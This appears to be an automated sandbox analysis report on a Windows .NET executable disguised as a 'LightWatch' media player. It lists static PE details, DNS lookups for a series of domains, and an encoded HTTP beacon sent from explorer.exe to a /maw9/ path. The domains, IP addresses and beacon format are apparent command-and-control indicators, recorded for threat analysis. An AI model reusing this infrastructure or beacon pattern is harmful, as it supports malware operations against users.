                                                                    File Icon

                                                                    Icon Hash:00828e8e8686b000

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x4b5b7e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                    Time Stamp:0x608FAFA4 [Mon May 3 08:09:08 2021 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:v4.0.30319
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xb5b2c0x4f.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xb60000xeb8.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xb80000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000xb3b840xb3c00False0.938279620132data7.93407065965IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0xb60000xeb80x1000False0.375732421875data4.76936310613IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0xb80000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_VERSION0xb60900x38cPGP symmetric key encrypted data - Plaintext or unencrypted data
                                                                    RT_MANIFEST0xb642c0xa85XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

                                                                    Imports

                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain

                                                                    Version Infos

                                                                    DescriptionData
                                                                    Translation0x0000 0x04b0
                                                                    LegalCopyrightCopyright 2018
                                                                    Assembly Version1.0.0.0
                                                                    InternalNameTOKENPRIMARYGROUP.exe
                                                                    FileVersion1.0.1.35
                                                                    CompanyNameUnguest
                                                                    LegalTrademarksUnguest
                                                                    CommentsA light media player
                                                                    ProductNameLightWatch
                                                                    ProductVersion1.0.1.35
                                                                    FileDescriptionLightWatch
                                                                    OriginalFilenameTOKENPRIMARYGROUP.exe

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    05/03/21-14:52:13.170221ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:13.208071ICMP449ICMP Time-To-Live Exceeded in Transit84.17.52.126192.168.2.6
                                                                    05/03/21-14:52:13.208862ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:13.243956ICMP449ICMP Time-To-Live Exceeded in Transit149.11.89.129192.168.2.6
                                                                    05/03/21-14:52:13.245145ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:13.284303ICMP449ICMP Time-To-Live Exceeded in Transit130.117.50.25192.168.2.6
                                                                    05/03/21-14:52:13.285192ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:13.326276ICMP449ICMP Time-To-Live Exceeded in Transit130.117.0.62192.168.2.6
                                                                    05/03/21-14:52:13.327004ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:13.373769ICMP449ICMP Time-To-Live Exceeded in Transit154.54.36.253192.168.2.6
                                                                    05/03/21-14:52:13.374138ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:13.420985ICMP449ICMP Time-To-Live Exceeded in Transit154.54.37.30192.168.2.6
                                                                    05/03/21-14:52:13.423338ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:17.216262ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:21.221518ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:25.217066ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:29.445869ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:33.218240ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:33.262544ICMP449ICMP Time-To-Live Exceeded in Transit4.69.163.33192.168.2.6
                                                                    05/03/21-14:52:33.263052ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:37.218445ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:41.217783ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:45.219410ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:49.218385ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:53.220185ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:57.218909ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:01.219208ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:05.219924ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:09.220096ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:13.220160ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:17.221426ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:21.221815ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:25.221377ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:29.221725ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:33.255775ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:37.226355ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:41.222918ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:41.302735TCP1201ATTACK-RESPONSES 403 Forbidden804975434.102.136.180192.168.2.6
                                                                    05/03/21-14:53:45.223564ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:49.223311ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:53.223679ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:57.224332ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:01.236118ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:02.995352TCP1201ATTACK-RESPONSES 403 Forbidden804976234.102.136.180192.168.2.6
                                                                    05/03/21-14:54:05.232558ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:09.237107ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:13.233310ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:17.233252ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:21.233525ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:25.233831ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:29.234762ICMP384ICMP PING192.168.2.68.241.89.254

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    May 3, 2021 14:53:41.123671055 CEST4975480192.168.2.634.102.136.180
                                                                    May 3, 2021 14:53:41.164711952 CEST804975434.102.136.180192.168.2.6
                                                                    May 3, 2021 14:53:41.164901972 CEST4975480192.168.2.634.102.136.180
                                                                    May 3, 2021 14:53:41.165328026 CEST4975480192.168.2.634.102.136.180
                                                                    May 3, 2021 14:53:41.206484079 CEST804975434.102.136.180192.168.2.6
                                                                    May 3, 2021 14:53:41.302735090 CEST804975434.102.136.180192.168.2.6
                                                                    May 3, 2021 14:53:41.302769899 CEST804975434.102.136.180192.168.2.6
                                                                    May 3, 2021 14:53:41.303035021 CEST4975480192.168.2.634.102.136.180
                                                                    May 3, 2021 14:53:41.303069115 CEST4975480192.168.2.634.102.136.180
                                                                    May 3, 2021 14:53:41.344063044 CEST804975434.102.136.180192.168.2.6
                                                                    May 3, 2021 14:53:46.635814905 CEST4975780192.168.2.6202.254.234.152
                                                                    May 3, 2021 14:53:46.949348927 CEST8049757202.254.234.152192.168.2.6
                                                                    May 3, 2021 14:53:46.949485064 CEST4975780192.168.2.6202.254.234.152
                                                                    May 3, 2021 14:53:46.949692011 CEST4975780192.168.2.6202.254.234.152
                                                                    May 3, 2021 14:53:47.263036013 CEST8049757202.254.234.152192.168.2.6
                                                                    May 3, 2021 14:53:47.265083075 CEST8049757202.254.234.152192.168.2.6
                                                                    May 3, 2021 14:53:47.265172958 CEST8049757202.254.234.152192.168.2.6
                                                                    May 3, 2021 14:53:47.265407085 CEST4975780192.168.2.6202.254.234.152
                                                                    May 3, 2021 14:53:47.265433073 CEST4975780192.168.2.6202.254.234.152
                                                                    May 3, 2021 14:53:47.578778028 CEST8049757202.254.234.152192.168.2.6
                                                                    May 3, 2021 14:53:52.445022106 CEST4976080192.168.2.6181.214.142.2
                                                                    May 3, 2021 14:53:52.576229095 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.576344967 CEST4976080192.168.2.6181.214.142.2
                                                                    May 3, 2021 14:53:52.576576948 CEST4976080192.168.2.6181.214.142.2
                                                                    May 3, 2021 14:53:52.707530022 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.709163904 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.709183931 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.709220886 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.709239006 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.709256887 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.709278107 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.709296942 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.709311962 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.709326029 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.709336996 CEST4976080192.168.2.6181.214.142.2
                                                                    May 3, 2021 14:53:52.709460020 CEST4976080192.168.2.6181.214.142.2
                                                                    May 3, 2021 14:53:52.709512949 CEST4976080192.168.2.6181.214.142.2
                                                                    May 3, 2021 14:53:52.842205048 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:54:02.815330029 CEST4976280192.168.2.634.102.136.180
                                                                    May 3, 2021 14:54:02.856976986 CEST804976234.102.136.180192.168.2.6
                                                                    May 3, 2021 14:54:02.857342958 CEST4976280192.168.2.634.102.136.180
                                                                    May 3, 2021 14:54:02.857573986 CEST4976280192.168.2.634.102.136.180
                                                                    May 3, 2021 14:54:02.898530960 CEST804976234.102.136.180192.168.2.6
                                                                    May 3, 2021 14:54:02.995352030 CEST804976234.102.136.180192.168.2.6
                                                                    May 3, 2021 14:54:02.995368958 CEST804976234.102.136.180192.168.2.6
                                                                    May 3, 2021 14:54:02.996453047 CEST4976280192.168.2.634.102.136.180
                                                                    May 3, 2021 14:54:02.996651888 CEST4976280192.168.2.634.102.136.180
                                                                    May 3, 2021 14:54:03.038955927 CEST804976234.102.136.180192.168.2.6
                                                                    May 3, 2021 14:54:13.178071022 CEST4976380192.168.2.6107.180.57.119
                                                                    May 3, 2021 14:54:13.310555935 CEST8049763107.180.57.119192.168.2.6
                                                                    May 3, 2021 14:54:13.310719013 CEST4976380192.168.2.6107.180.57.119
                                                                    May 3, 2021 14:54:13.310914993 CEST4976380192.168.2.6107.180.57.119
                                                                    May 3, 2021 14:54:13.442984104 CEST8049763107.180.57.119192.168.2.6
                                                                    May 3, 2021 14:54:13.470249891 CEST8049763107.180.57.119192.168.2.6
                                                                    May 3, 2021 14:54:13.470271111 CEST8049763107.180.57.119192.168.2.6
                                                                    May 3, 2021 14:54:13.470285892 CEST8049763107.180.57.119192.168.2.6
                                                                    May 3, 2021 14:54:13.470494986 CEST4976380192.168.2.6107.180.57.119
                                                                    May 3, 2021 14:54:13.470557928 CEST4976380192.168.2.6107.180.57.119
                                                                    May 3, 2021 14:54:13.602511883 CEST8049763107.180.57.119192.168.2.6

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    May 3, 2021 14:52:06.801609993 CEST5177453192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:06.850207090 CEST53517748.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:07.866614103 CEST5602353192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:07.917653084 CEST53560238.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:09.031147957 CEST5838453192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:09.085213900 CEST53583848.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:10.104856014 CEST6026153192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:10.164602041 CEST53602618.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:11.426073074 CEST5606153192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:11.474884033 CEST53560618.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:12.578313112 CEST5833653192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:12.627011061 CEST53583368.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:13.094438076 CEST5378153192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:13.169132948 CEST53537818.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:13.644759893 CEST5406453192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:13.694717884 CEST53540648.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:14.624813080 CEST5281153192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:14.676548004 CEST53528118.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:16.291661024 CEST5529953192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:16.343203068 CEST53552998.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:17.243180037 CEST6374553192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:17.300841093 CEST53637458.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:18.206481934 CEST5005553192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:18.255245924 CEST53500558.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:19.370393038 CEST6137453192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:19.419213057 CEST53613748.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:20.784404039 CEST5033953192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:20.833194017 CEST53503398.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:21.732249975 CEST6330753192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:21.781076908 CEST53633078.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:22.957520008 CEST4969453192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:23.006467104 CEST53496948.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:24.825062990 CEST5498253192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:24.873651981 CEST53549828.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:25.944996119 CEST5001053192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:25.997683048 CEST53500108.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:39.021899939 CEST6371853192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:39.070730925 CEST53637188.8.8.8192.168.2.6
                                                                    May 3, 2021 14:52:43.575400114 CEST6211653192.168.2.68.8.8.8
                                                                    May 3, 2021 14:52:43.628989935 CEST53621168.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:02.776420116 CEST6381653192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:02.835649014 CEST53638168.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:09.870780945 CEST5501453192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:10.079027891 CEST53550148.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:10.188205957 CEST6220853192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:10.256165028 CEST53622088.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:11.570303917 CEST5757453192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:11.623312950 CEST53575748.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:12.723320961 CEST5181853192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:12.848351955 CEST53518188.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:13.611901045 CEST5662853192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:13.724877119 CEST53566288.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:15.156788111 CEST6077853192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:15.214942932 CEST53607788.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:16.745594978 CEST5379953192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:16.805594921 CEST5468353192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:16.806613922 CEST53537998.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:16.865751982 CEST53546838.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:17.709784985 CEST5932953192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:17.852190971 CEST53593298.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:20.214184046 CEST6402153192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:20.266258001 CEST53640218.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:22.851625919 CEST5612953192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:22.910708904 CEST53561298.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:23.646487951 CEST5817753192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:23.703864098 CEST53581778.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:41.036803007 CEST5070053192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:41.099087954 CEST53507008.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:46.320147038 CEST5406953192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:46.609731913 CEST6117853192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:46.634038925 CEST53540698.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:46.644306898 CEST5701753192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:46.668921947 CEST53611788.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:46.693243027 CEST53570178.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:52.274975061 CEST5632753192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:52.444093943 CEST53563278.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:53.144257069 CEST5024353192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:53.218609095 CEST53502438.8.8.8192.168.2.6
                                                                    May 3, 2021 14:54:02.750222921 CEST6205553192.168.2.68.8.8.8
                                                                    May 3, 2021 14:54:02.814151049 CEST53620558.8.8.8192.168.2.6
                                                                    May 3, 2021 14:54:08.005501032 CEST6124953192.168.2.68.8.8.8
                                                                    May 3, 2021 14:54:08.063040972 CEST53612498.8.8.8192.168.2.6
                                                                    May 3, 2021 14:54:13.094579935 CEST6525253192.168.2.68.8.8.8
                                                                    May 3, 2021 14:54:13.176599026 CEST53652528.8.8.8192.168.2.6
                                                                    May 3, 2021 14:54:18.493829966 CEST6436753192.168.2.68.8.8.8
                                                                    May 3, 2021 14:54:18.563572884 CEST53643678.8.8.8192.168.2.6
                                                                    May 3, 2021 14:54:23.578939915 CEST5506653192.168.2.68.8.8.8
                                                                    May 3, 2021 14:54:23.788476944 CEST53550668.8.8.8192.168.2.6
                                                                    May 3, 2021 14:54:29.500647068 CEST6021153192.168.2.68.8.8.8
                                                                    May 3, 2021 14:54:29.579925060 CEST53602118.8.8.8192.168.2.6

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    May 3, 2021 14:53:41.036803007 CEST192.168.2.68.8.8.80x58cdStandard query (0)www.dinkoistmatrimony.comA (IP address)IN (0x0001)
                                                                    May 3, 2021 14:53:46.320147038 CEST192.168.2.68.8.8.80xcbadStandard query (0)www.premier-moment.infoA (IP address)IN (0x0001)
                                                                    May 3, 2021 14:53:52.274975061 CEST192.168.2.68.8.8.80x53deStandard query (0)www.ecosanhn.comA (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:02.750222921 CEST192.168.2.68.8.8.80xd3c6Standard query (0)www.curvygirlholiday.comA (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:08.005501032 CEST192.168.2.68.8.8.80x4030Standard query (0)www.vipbrandwatch.infoA (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:13.094579935 CEST192.168.2.68.8.8.80xd69bStandard query (0)www.networkingmaderas.comA (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:18.493829966 CEST192.168.2.68.8.8.80x230dStandard query (0)www.beachrockisland.comA (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:23.578939915 CEST192.168.2.68.8.8.80x847eStandard query (0)www.itechfreak.comA (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:29.500647068 CEST192.168.2.68.8.8.80x704cStandard query (0)www.jaimericart.comA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    May 3, 2021 14:53:41.099087954 CEST8.8.8.8192.168.2.60x58cdNo error (0)www.dinkoistmatrimony.comdinkoistmatrimony.comCNAME (Canonical name)IN (0x0001)
                                                                    May 3, 2021 14:53:41.099087954 CEST8.8.8.8192.168.2.60x58cdNo error (0)dinkoistmatrimony.com34.102.136.180A (IP address)IN (0x0001)
                                                                    May 3, 2021 14:53:46.634038925 CEST8.8.8.8192.168.2.60xcbadNo error (0)www.premier-moment.info202.254.234.152A (IP address)IN (0x0001)
                                                                    May 3, 2021 14:53:52.444093943 CEST8.8.8.8192.168.2.60x53deNo error (0)www.ecosanhn.comecosanhn.comCNAME (Canonical name)IN (0x0001)
                                                                    May 3, 2021 14:53:52.444093943 CEST8.8.8.8192.168.2.60x53deNo error (0)ecosanhn.com181.214.142.2A (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:02.814151049 CEST8.8.8.8192.168.2.60xd3c6No error (0)www.curvygirlholiday.comcurvygirlholiday.comCNAME (Canonical name)IN (0x0001)
                                                                    May 3, 2021 14:54:02.814151049 CEST8.8.8.8192.168.2.60xd3c6No error (0)curvygirlholiday.com34.102.136.180A (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:08.063040972 CEST8.8.8.8192.168.2.60x4030Name error (3)www.vipbrandwatch.infononenoneA (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:13.176599026 CEST8.8.8.8192.168.2.60xd69bNo error (0)www.networkingmaderas.comnetworkingmaderas.comCNAME (Canonical name)IN (0x0001)
                                                                    May 3, 2021 14:54:13.176599026 CEST8.8.8.8192.168.2.60xd69bNo error (0)networkingmaderas.com107.180.57.119A (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:18.563572884 CEST8.8.8.8192.168.2.60x230dName error (3)www.beachrockisland.comnonenoneA (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:23.788476944 CEST8.8.8.8192.168.2.60x847eNo error (0)www.itechfreak.com192.238.144.41A (IP address)IN (0x0001)
                                                                    May 3, 2021 14:54:29.579925060 CEST8.8.8.8192.168.2.60x704cNo error (0)www.jaimericart.comjaimericart.comCNAME (Canonical name)IN (0x0001)
                                                                    May 3, 2021 14:54:29.579925060 CEST8.8.8.8192.168.2.60x704cNo error (0)jaimericart.com81.88.48.71A (IP address)IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • www.dinkoistmatrimony.com
                                                                    • www.premier-moment.info
                                                                    • www.ecosanhn.com
                                                                    • www.curvygirlholiday.com
                                                                    • www.networkingmaderas.com

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.64975434.102.136.18080C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    May 3, 2021 14:53:41.165328026 CEST10311OUTGET /maw9/?AVF=4eDAg+VUuFTPb+HpMV2XwHXrAkW6c8A/v4D4zAieFew51h9R0F5m+f+tz7m/68XBKeAB57yd0w==&6l=sHbLpdw8x0Nx4 HTTP/1.1
                                                                    Host: www.dinkoistmatrimony.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    May 3, 2021 14:53:41.302735090 CEST10311INHTTP/1.1 403 Forbidden
